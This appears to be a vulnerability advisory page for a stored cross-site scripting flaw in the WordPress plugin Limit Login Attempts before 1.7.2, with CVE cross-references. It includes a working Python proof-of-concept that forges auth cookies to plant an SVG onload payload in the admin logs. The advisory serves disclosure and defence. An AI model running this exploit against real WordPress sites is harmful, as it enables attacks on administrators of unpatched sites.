Lucene search
Marc MontpasWPEX-ID:461CBCCA-AED7-4C92-BA35-EBABF4FCD810HistoryApr 10, 2023 - 12:00 a.m.
Limit Login Attempts < 1.7.2 - Subscriber+ Stored XSS
2023-04-1000:00:00
Marc Montpas
78
wordpress
subscriber
vulnerability
stored xss
security issue
cross-site scripting
login attempts
EPSS
0.001
Percentile
23.5%
The plugin does not sanitize and escape usernames when outputting them back in the logs dashboard, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks
import requests
import sys
import re
if len(sys.argv) != 4:
print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
sys.exit()
url = sys.argv[1].rstrip('/')
with requests.Session() as s:
print('Logging in...')
# Log into WordPress using our Subscriber account
res = s.post(
url + '/wp-login.php',
headers={ 'Cookie': 'wordpress_test_cookie=WP Cookie check' },
data={'log':sys.argv[2], 'pwd':sys.argv[3], 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie':1})
# Send 5 corrupted cookies with malicious usernames in them
print('Sending corrupted cookies 5 times..')
for cookie in s.cookies.keys():
if re.match(r'wordpress_[0-9a-f]+', cookie):
malicious_payload = s.cookies.get(name=cookie, path='/').replace(sys.argv[2], 'MALICIOUS_USERNAME<svg/onload=alert(1)//>')
s.cookies.set(name=cookie, value=None, path='/')
s.cookies.set(name=cookie, value=malicious_payload, path='/')
for i in range(5):
s.get( url + '/wp-admin/')
print(f'View limit-login-attempts logs now at {sys.argv[1]}/wp-admin/options-general.php?page=limit-login-attempts')Related
cve
cve
CVE-2023-1861
2023-05-02 08:15:10
wpvulndb
wpvulndb
Limit Login Attempts < 1.7.2 - Subscriber+ Stored XSS
2023-04-10 00:00:00
nvd
nvd
CVE-2023-1861
2023-05-02 08:15:10
cvelist
cvelist
CVE-2023-1861 Limit Login Attempts < 1.7.2 - Subscriber+ Stored XSS
2023-05-02 07:04:50
prion
prion
Cross site scripting
2023-05-02 08:15:00
wordfence
wordfence